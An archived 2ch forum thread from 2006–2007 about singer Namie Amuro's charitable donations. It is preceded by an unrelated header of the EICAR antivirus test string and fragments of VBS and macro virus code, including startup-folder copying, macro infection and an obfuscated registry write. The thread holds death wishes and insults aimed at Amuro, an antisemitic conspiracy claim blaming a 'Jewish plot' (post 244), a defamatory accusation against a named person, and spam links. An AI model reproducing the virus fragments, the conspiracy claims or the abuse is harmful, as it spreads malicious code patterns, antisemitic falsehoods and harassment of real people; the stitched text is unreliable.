X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()

173 :読者の声:2006/11/30(木) 15:37:24 ID:lX5o2wfn
>>160
>>152がいい例だな

174 :読者の声:2006/12/03(日) 14:42:44 ID:4rxrX8em
  

175 :読者の声:2006/12/05(火) 23:55:51 ID:na3gxAVC
紙ね!!

176 :読者の声:2006/12/21(木) 13:43:07 ID:A4isa0lI
  

177 :読者の声:2007/01/04(木) 11:51:44 ID:OZDUHuMq
hh

178 :読者の声:2007/01/04(木) 14:13:03 ID:L9pqDA/o
いつの間にか俺より年下になってる・・・ゲームキャラかこいつは・・・。

179 :読者の声:2007/01/04(木) 14:18:53 ID:mzMJuWEV
玉置成実は300円しか募金しなかった

180 :読者の声:2007/01/04(木) 14:49:03 ID:DjcDSByZ
>>178
おめがキャラに思えてならねw

181 :読者の声:2007/01/04(木) 19:17:30 ID:+WClIEHk
2005年の記事だからね。

182 :読者の声:2007/01/05(金) 02:42:19 ID:sYUIJ6IJ
あたし今27だけど1000万も持ってない…
持ってても寄付出来ないかも。

183 :読者の声:2007/01/05(金) 03:55:20 ID:wXDEqPsP
アムロヲタはこのネタをいつまで引っ張る気だ

184 :読者の声:2007/01/05(金) 14:45:01 ID:GoiHqOcJ
自演乙

185 :読者の声:2007/01/05(金) 14:49:47 ID:noxyJOnd
http://www.youtube.com/watch?v=1eBjWI2BE3w
これのソバ食ってるシーン性格悪そう〜w

186 :読者の声:2007/01/05(金) 14:59:15 ID:SBs4n3tz
>>185
なんか色んな安室スレにそれ貼ってるね。

187 :読者の声:2007/01/05(金) 22:25:16 ID:FEjNGust
なにしても叩かれるんじゃねーか

188 :読者の声:2007/01/06(土) 09:44:09 ID:qVCwQqM8



189 :読者の声:2007/01/07(日) 17:20:02 ID:eUcE2vtz
凄いよなぁ〜

190 :読者の声:2007/01/07(日) 19:53:26 ID:oof6pGnl
  

191 :読者の声:2007/01/08(月) 02:46:45 ID:TYnmxAM9
良い人なんだね

192 :読者の声:2007/01/08(月) 12:43:28 ID:kn589v7P
ねらーなんて一円さえも惜しむのに

193 :☆みぃたん☆ ◆HIEEw3cAko :2007/01/08(月) 13:03:12 ID:4qzsAIfu
自分路線貫くゅったのに売れなくなるとすぐ売れ線バラード

本当嘘っきで憎ぃ女だゎ

















キモ

194 :読者の声:2007/01/10(水) 12:45:01 ID:4UTBd7KM
>>193
離婚女は氏ねばいい

195 :読者の声:2007/01/10(水) 20:33:55 ID:ZU1P5CQP
つまりこのスレは、偽善者のアムロについて語るスレって訳だな。

196 :読者の声:2007/01/10(水) 21:59:49 ID:Tod1EQCz
>>193
自分路線だから色んなのを歌う。

197 :読者の声:2007/01/10(水) 23:17:10 ID:9uOCe8E3
すごい

198 :読者の声:2007/01/11(木) 12:39:22 ID:W4iYTNzh
屑女の鑑
市ね

199 :読者の声:2007/01/13(土) 01:04:13 ID:M4cUPYGM
(^人^)

200 :読者の声:2007/01/13(土) 01:59:42 ID:noGWVeSZ
しない善よりする偽善。

意図はともかくいー事したやん。

201 :読者の声:2007/01/13(土) 02:47:24 ID:b8ushcwQ
一千万はすごいとおもうし、宇多田ヒカルよりはるかにまし

202 :読者の声:2007/01/13(土) 12:27:14 ID:jwBz/IaS
すげーな安室

203 :読者の声:2007/01/13(土) 17:18:46 ID:EuLlIZ2N
   

204 :読者の声:2007/01/13(土) 17:30:24 ID:TZJVwyhb
何億も持ってるんだから一千万くらい寄付して当然

205 :読者の声:2007/01/13(土) 17:39:59 ID:BYNSVcUz
中島美嘉のファンだけ集まるスレ
http://music7.2ch.net/test/read.cgi/musicjf/1167922000/
中島美嘉のファンだけ集まるスレ
http://music7.2ch.net/test/read.cgi/musicjf/1167922000/
中島美嘉のファンだけ集まるスレ
http://music7.2ch.net/test/read.cgi/musicjf/1167922000/

206 :読者の声:2007/01/13(土) 17:41:00 ID:VTUByhWv
8000万で安いと言ってた安室が1000万…500万って…

207 :読者の声:2007/01/13(土) 17:41:04 ID:wsfRJ042
>>204はアホだな
てめーは何十万持ってても百円も
寄付出来ないチンカス以下

208 :読者の声:2007/01/13(土) 17:45:39 ID:mkUtNCzR
自分の子供に寄付してやれよ安室

209 :読者の声:2007/01/13(土) 18:13:55 ID:6qUz01Ku
>>208
なんで一緒に住んでるのに寄付?

210 :読者の声:2007/01/14(日) 00:11:28 ID:LoK7+kvX
すご〜い

211 :読者の声:2007/01/14(日) 11:14:07 ID:859iPNz+
>>204
それ、アムロ以外の多くの芸能人・有名人に当てはまりますけどw
ただのアムロアンチばればれ発言で恥ずかしくないか?

212 :読者の声:2007/01/14(日) 14:51:17 ID:09CFLYwf
    

213 :読者の声:2007/01/17(水) 23:47:55 ID:lmRHmhBP
    

214 :読者の声:2007/01/18(木) 00:01:35 ID:lTYFoLMK
漢だな

215 :読者の声:2007/01/18(木) 00:36:20 ID:82JZrGxa
お金持ちで性格も素晴らしい数少ない人

216 :読者の声:2007/01/18(木) 12:44:50 ID:Yx62CnyG ?2BP(0)
('A`)

217 :読者の声:2007/01/18(木) 16:52:26 ID:Es089hAG
安室あんま好きじゃなかったけど
見直した!

偉い!



218 :読者の声:2007/01/18(木) 18:08:57 ID:2TBRDbYa
嘘でもほんとでも別にいいじゃん。
結局アムロ嫌いだからそーゆーんだろ?
痛いんだよね。
みんな暇すぎwwwwww
アムロ叩く前に机に向かって勉強しなwwww
一般ピープル最高ー(^Д^)m9プギャー

219 :読者の声:2007/01/19(金) 00:33:18 ID:Mmsqa+ox
てか1時間番組2回でれば1000万だし

220 :読者の声:2007/01/19(金) 02:27:05 ID:rHaHbvBi
こういう所尊敬できるよな。

221 :読者の声:2007/01/19(金) 19:34:15 ID:xwhEA4ea
1月17日8時1分配信 サンケイスポーツ 
 財政再建団体へと移行する北海道夕張市を、歌手の松山千春(51)が16日、 
初めて訪れた。北海道足寄町出身の千春にとって、同市の財政破綻は 
他人事ではない様子で、同市に100万円を寄付したほか、商店街に繰り出し、 
電化製品、CDなどをまとめ買いするなど大散財。さらに市の老人ホームに 
アポなし訪問し、購入した品物の一部を寄付した。春には同市で無料コンサートも 
開く予定で、活気のない夕張に元気を注入していく。 
 千春はこの日午後2時ごろ、夕張市本町にある市役所を訪れ、後藤健二市長 
と対面。開口一番「何かしたい、でも何をしたらいいかわからない。 
(北海道出身のアーティストは)みんなそう思っているはず」と切り出した。 
 その上で、「まず、夕張市民のために無料コンサートを開きたい。 
年配の方にも来てもらえるようなものにしたい」と話し、4月から始まる 

CD、スポーツ用品などを次から次に買いまくった。夕張市の住民に 
直接元気を与えるのが目的。購入した商品は千春が毎年暮れに慰問で 
訪れる札幌市内の児童養護施設「柏葉荘」に寄付する予定だったが、 
夕張の老人ホーム「汽笛が聞こえる」にもアポなしで足を運び、 
ウーロン茶などを寄付した。 
 夕張市は、全盛期に約11万2000人いた人口が、今では 
約1万3000人弱と激減している。千春も実際に町を見て回り、 
「開いている店が少なくて、金を使うのも大変だった」と、改めて同市の 
窮状を実感した様子。「財政破綻はここだけの問題ではない。国の問題だし、 
夕張がどう立て直していくかは、今後のモデルケースにもなるはず」。 
今後も夕張再生に尽力する決意を口にした。 
ソース:Yahoo!ニュース エンターテインメント 
http://headlines.yahoo.co.jp/hl?a=20070117-00000032-sanspo-ent 


222 :読者の声:2007/01/20(土) 23:21:37 ID:RJXDdIxo
222だったらののたんとお風呂

223 :読者の声:2007/01/20(土) 23:33:33 ID:iC09B2G3
なかなか金持ちでも性格は悪いのが多いから(守銭奴、金の亡者、ブランド大好き、傲慢)
彼女は貴重だよ

224 :読者の声:2007/01/21(日) 06:54:18 ID:2J4OklyD
新潟のときは寄付しなかったのかな?
自分の国が先でしょう。

225 :読者の声:2007/01/21(日) 09:23:22 ID:d02Aso5Y
>>224
500万したみたいだよ。

226 :読者の声:2007/01/21(日) 11:13:22 ID:Qny2w9p9
阪神のときは寄付しなかったのかな?
自分の国が先でしょう。


227 :読者の声:2007/01/21(日) 12:10:34 ID:N6GdDehx
あちこちに多額の寄付してるよね

228 :読者の声:2007/01/21(日) 13:11:57 ID:sg6zWQD2
安室ちゃん偉いなあー

自分の国が先でしょうとか笑
それよりもまず寄付してない人がたくさんいるじゃんか

229 :読者の声:2007/01/21(日) 14:58:24 ID:Qny2w9p9

 単なる売名行為









                                    終了。




230 :読者の声:2007/01/21(日) 16:59:53 ID:F/YtUTSY
作詞印税も作曲印税も0なのにそんな金あるわけねーだろ
売名売名

231 :読者の声:2007/01/21(日) 19:02:07 ID:CpPWEDQH
>>

232 :読者の声:2007/01/21(日) 19:03:38 ID:CpPWEDQH
>>230
じゃあ本人に嘘かどうか聞けよ

233 :読者の声:2007/01/21(日) 19:46:10 ID:h0zJ3dai
何この作り話しw
便所の落書き。八年前に消えた落ちぶれ歌手を良い人に見せようとしても無駄。今だに天狗の勘違い女。かなり性格悪いし

234 :読者の声:2007/01/21(日) 19:47:22 ID:Qny2w9p9

こういうことは密かにやるのが美徳なのであって、特に著名人が「寄付しました」って公言
すれば売名と受け取られるのは当然。本人の意思にかかわらず、そう受け取る人もいるのが
世間なのであって、そのことに文句を言うのは筋違い。

ちなみに、こんなスレタイつけて常にage続けて宣伝&イメージアップになると思っている奴は
馬鹿。逆効果。



235 :読者の声:2007/01/22(月) 03:01:53 ID:mzyem5qt
安室いいやつなんだな
顔は好みじゃないけど100万円俺にくれるなら
10秒間だけ抱いてやってもいいぞ

236 :読者の声:2007/01/22(月) 03:45:04 ID:0Ipu7W7H
>>234
安室は極秘でやったけど、後からバレちゃっただけの話
安室はそういうの一番嫌う人だしね
これだけの超有名人だからしょうがない

237 :読者の声:2007/01/22(月) 06:14:29 ID:X4Og7tW7
ねらーは口ばっか
おまえらも寄付しろ
金無いかwww

238 :読者の声:2007/01/22(月) 10:20:05 ID:DcG5eFse
税金対策

239 :読者の声:2007/01/22(月) 12:11:22 ID:Nk62k7Ix
>>236
だったらなおさら、こんなスレ晒すのは本人の意思に反するだろ。

240 :読者の声:2007/01/22(月) 12:36:50 ID:PyMKn8xj
寄付しても結局、文句や言いがかりを付ける奴って必ずいるんだよね
そういう奴に限って何もしてないしw

241 :読者の声:2007/01/22(月) 15:54:32 ID:6JnXpp5s
阪神のときは寄付しなかったのかな?
自分の国が先でしょう。
     /     \ 
    /   / \ \  
   |   (゚) (゚)    | 
   |    )●(   |
   \   ▽    ノ 
     \_    /
    /   ̄ ̄\


242 :読者の声:2007/01/22(月) 16:42:57 ID:Nk62k7Ix


こんなスレ晒すのは本人の意思に反するだろ。


反論できなくなったな。>>あげ厨 www


243 :読者の声:2007/01/23(火) 09:26:22 ID:crlsMV4o
コンビニから寄付しました

244 :読者の声:2007/01/23(火) 09:38:00 ID:slrmaqFo
<小馬鹿作戦?>
それと同じですが、去年、植草教授という大学教授が女性のスカートの中を鏡で覗いたことで警察に捕まり、
さらにテレビで取り上げられて話題になりました。彼についた仇名は「ミラーマン植草」です。
もちろん彼は、大学教授をクビになり、社会生命は抹殺されました。
しかし、この植草教授は、冤罪の可能性が十分にあります。
なぜなら、彼は当時、小泉と竹中を糾弾しており、郵政民営化に反対していたのです。
彼はユダヤの陰謀を突き止め、そのユダヤの犬となってしまった小泉と竹中を国賊であると糾弾していたのです。
当然、国家はこの男を危険人物としてマークします。何としてでもこの男の口を封じなければなりません。
暗殺という手法を使えば簡単ですが、そんなことをすれば社会問題となり、
植草教授が追求してきた問題が却って目立ってしまいます。
誰かが引き継いで亡き植草教授の無念を晴らそうとするでしょう。それでは目的は達成しません。
そこで使った手法が痴漢に仕立て上げる!これです。これほど社会的生命を抹殺する手法はありません。
痴漢程度のことと思われるでしょうが、彼は有名な大学教授です。メンツは丸潰れです。


245 :読者の声:2007/01/23(火) 10:17:10 ID:s2WVKuLU
この不況時に億単位の収入を稼いでいて
なおかつ1000万単位の寄付をあちこちにするほどの慈悲深い心を持ってる

もうそれだけで手放しで素晴らしい


246 :読者の声:2007/01/23(火) 11:03:31 ID:cnE2e9lC
1000万寄付した人に俺は何も文句なんて言えないな

つか他にも内密に寄付してる人結構いるんだろうな


247 :読者の声:2007/01/23(火) 23:23:42 ID:fCm/6Ucp
【社会】 "住宅ローン引くと、手取りが19万になると職員激怒"の夕張市、北海道が赤字額360億円肩代わり
http://news22.2ch.net/test/read.cgi/newsplus/1169179022/l50

★北海道が夕張市の赤字額360億円を低利融資へ

・北海道は19日、財政再建団体に移行する夕張市の赤字額の全額にあたる約360億円を
 肩代わりする方向で調整に入った。

 道が、金融機関から借り入れた資金を、同市に低利で再融資し、安定的な資金供給に
 つなげる。2007年度道予算に盛り込む方針。

 夕張市は、赤字額を金融機関からの一時借入金でまかなっており、肩代わり融資が実現
 すると、財政再建計画の確実性が大きく担保されるほか、約20年と見込まれる計画期間の
 短縮も期待される。

 道によると、肩代わりは、金利変動に左右されず、市の債務を安定的に圧縮することが
 狙い。道は当初、夕張問題での財政負担に慎重な姿勢を見せていた。ところが、新年度
 からスタートする再建計画の前提としていた、国の「赤字地方債」の制度化は「早くても
 09年度から」(関係者)とズレが生じるため、計画の実現性を確実にする支援策を検討していた。
 http://headlines.yahoo.co.jp/hl?a=20070119-00000104-yom-pol

※元ニューススレ
・【社会】 "夕張市職員、怒り" 手取り、生活保護以下の19万円に?…住宅ローンなど引くと残り19万円★4
 http://news22.2ch.net/test/read.cgi/newsplus/1167320918/
・【社会】 「死刑宣告だ!」 "倒産"夕張市、ボーナス半減支給…43歳モデルで42万円★3
 http://news19.2ch.net/test/read.cgi/newsplus/1167045960/




248 :読者の声:2007/01/24(水) 18:03:06 ID:monbGr5c
寄付に関してまで叩いてるアンチって無理がありすぎるなw
安室が今回だけでなく数年前から寄付してきた事を「知らない」時点で安室がひっそりとやってきた事の証明になってるw
今ではバレてるから調べりゃすぐわかるけど。
しかも安室にすべての寄付をさせようという意味不明ななんの概念もない発言をしてるし…

249 :読者の声:2007/01/27(土) 12:26:25 ID:pub9Gq2R
これは普通に凄いと思う
しかもこれは一部で他にも寄付をいろいろ継続的にやってるようだし

250 :読者の声:2007/01/30(火) 00:16:17 ID:mrPiBguo
   

251 :読者の声:2007/01/30(火) 01:22:29 ID:p5rQFGU1
>>241
阪神のときはまだブレークしてなかったでしょ。貧乏だったの。
でも、新潟では寄付したらしいよ。

252 :読者の声:2007/01/31(水) 15:48:58 ID:1G3iD765
>>251
>>226

253 :読者の声:2007/02/01(木) 08:47:04 ID:CrePuXq6
沖縄での人気はどれくらいなんやろうか?

254 :読者の声:2007/02/01(木) 11:47:36 ID:IkGycfBl
なにげにいい子なんやな

255 :読者の声:2007/02/01(木) 12:34:24 ID:S1eTe2Bd
せっかく稼いでも税金で国にお金もっていかれるから
募金や寄付してお金を使った方が芸能人にとってはいいんだよ。
高感度あがるし。



256 :読者の声:2007/02/01(木) 13:10:11 ID:jQ3jLJnk
安室の寄付金よりもかなり少ない俺のオヤジの年収って一体…

257 :ガセ情報の真犯人は不思議研究所の森田健だった!!:2007/02/01(木) 13:22:51 ID:qlPMfznb
ガセ情報の真犯人は不思議研究所の森田健だった!!

どうやらジュセリーノ予言のガセ情報を流しているのは、
不思議研究所の森田健だな・・・・
理由はいろいろ考えれるが、もっとも有力なのは、ジュセリーノ予言を
自身の予言とすり替えて、金儲けしようという試みと、
ジュセリーノのポルトガルのガセ情報を翻訳したために、
その試みが無残にも企画倒れに終わってしまい逆恨み。
だいたいそんなとこか。しかし正確な情報が入れば、
またもや、悪巧みをしようと、現在ではジュセリーノガセ説を
必死に流しているといったとこか(笑)よくやるよ・・・

2chのジュセリーノガセ日本語訳情報
http://www.2chan.net/test/read.cgi?bbs=hobby&key=1169891808
ジュセリーノ予言の日本語訳ガセ情報ブログ
http://blog.masu.us/?eid=550212
森田健のモリケンドットコム
http://www.moritaken.com/
森田健不思議研究所
http://www.fushigikenkyujo.com/menu.asp
森田健の自作自演2ch宣伝スレ
http://hobby9.2ch.net/test/read.cgi/uranai/1151113131/
http://hobby9.2ch.net/test/read.cgi/uranai/1162562630/801-900



258 :読者の声:2007/02/01(木) 14:22:50 ID:lTGTq5wx
>>255
だから言ってるじゃん。
節税対策と売名。打算のたまもの。

259 :読者の声:2007/02/01(木) 14:29:22 ID:IBWSXbbz
売名だ税金対策だって言ってる奴は、
世のために何か貢献した事があるのだろうか。

260 :読者の声:2007/02/01(木) 14:36:45 ID:S1eTe2Bd
>>256 お父さんのことを悪く言っちゃいけないよ。
逆にお父さんの年収を超えて、親孝行でもしてあげなさい。

261 :読者の声:2007/02/01(木) 21:34:52 ID:lTGTq5wx
>>259
ところがあるんだなぁ〜これが。
残念だったな。
おめぇも年収の1/10くらい寄付しろや。

262 :\____________________/:2007/02/01(木) 23:27:41 ID:TaiN/flV
              〇
    | |    | |    | | o .| |    | |    | |    | |
    | |    | |    | | 。 | |    | |    | |    | |
    | |    | |    | |__| |    | |    | |    | |
――――───/     \──────‐\\
     ┌┬─/  ─    ─\─┐       \\
     ││/ o゚( ー)  (−)゚o\ .|         \\
     ││|      (__人__)    | |          \\
     └┴\     ` ⌒´   /.┘           \\
       /            \

                                  糸冬
                              ────────
                              制作・著作 犬HK

263 :読者の声:2007/02/02(金) 00:00:32 ID:8JmTnkzB
安室ってできた人間だな。
なかなかできないよなこんな事。
だからこれからも残っていくんだろう。


264 :読者の声:2007/02/02(金) 22:37:47 ID:t/W8KEaE
アンチ安室はクズしかいないってことが証明されたね

265 :読者の声:2007/02/03(土) 00:26:35 ID:H3REAJ92
素晴らしいな

266 :読者の声:2007/02/03(土) 01:55:12 ID:UZNubGaA
安室は自分が苦労してきたからこそできるのかな?


よくテレビで苦労を売りにしてる奴に限って寄付とかしないで自分の物欲まっしぐらって感じだし。。


267 :読者の声:2007/02/03(土) 01:59:23 ID:VxhfxTdu
売名とかいうのは、結局、自分は寄付したことないから
もしくは、寄付しないことを正当化したいからそういう
んじゃないかな。
だって、例え売名でもだれも寄付しなかったら、どうなるのさ?
寄付をするって行為をもっと正当評価したほうが文化的な
社会じゃない?

268 :読者の声:2007/02/03(土) 02:21:15 ID:WHR5RTSd
803 名前:読者の声 :2007/01/16(火) 16:44:34 ID:yjjg7euR
芸能文化音楽速報@2ch掲示板のアンチは
この板で有名な売上チャートヲタで"ニート"でネカマのマピ○♪
(ちせ○・ha○py・ky○n)とか言う流れ者&暴弱者(掲示板荒らし)。
(周りに流されるだけの知能厨房並ミーハ−ヲタ)

 アムロニワカファン→グローブニワカファン→華原ニワカファン→
 →あみニワカファン→モー娘ニワカファン→ELTニワカファン→
 →林檎ニワカファン→宇多田ニワカファン→あゆニワカファン→
 →中島ニワカファン→BoAニワカファン→邦楽&洋楽女性アイドルニワカファン
 →大塚ニワカファン→倖田ニワカファン→絢香ニワカファン→
 →ただ騒ぎたいだけのニワカファン。

269 :読者の声:2007/02/03(土) 11:44:01 ID:YJSnkV7Y
>>267
まじレスすれば、
本来なら個人の寄付や善意に頼らなくても皆が幸福である社会が理想なんだが。
特にスマトラ地震のように被害の規模が大きい場合は国際機関が即座に融資なり
援助なりできるよう平時から体制を整えておくべきなんだよ。

それから>>261は本当だよ。ま、言っちゃたらこれも売名になるけど、俺はまわりの
人には誰にも言ってない。

270 :読者の声:2007/02/03(土) 13:48:50 ID:3WpZaGPK
某サイトで安室ちゃんの名言として、『私はアイドル時代操られている機械だった。
考える時間も権利さえも与えてもらえなかった。
私は反抗し続けた。
私の人気は3年前急落した。
親友さえも安室奈美恵は終わったといった。
メディアに媚を売って人気を回復することは絶対したくない。1から這い上がってみせる。
ただもう一度歌を歌いたかった。
母の死は私を地獄へ突き落とした。
もう何もできなかった。
けど私も一人の母親なのだ。
息子のために頑張らなきゃいけない。
それが生きがい。

世間は息子を捨てた最低な母親と思っているかもしれない。
メディアもこぞってそう書きたてた。
けれど人がどう思うと関係ない。
私は息子のため自分のために歌い続ける。
私は自分の決めた道を突き進むだけ。

これからどれだけのファンが待っていてくれるか分からない。

まだまだ手探りの状態だけど私は凄く幸せ。

              uktimes雑誌より』


271 :読者の声:2007/02/03(土) 14:25:12 ID:mpUiHkZl
>>270
色んなとこに貼るのはいんですけど
実際は微妙に違うんですけどね・・・

272 :読者の声:2007/02/10(土) 20:18:36 ID:wrn7+dnT
ユーチューブみたいに動画も投稿できる芸能人の秘蔵映像発見!!
みんなのお宝映像も投稿できるよ!
面白動画はコチラ ↓↓↓
http://tv9.2ch.net/test/read.cgi/idol/1146627926/432

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)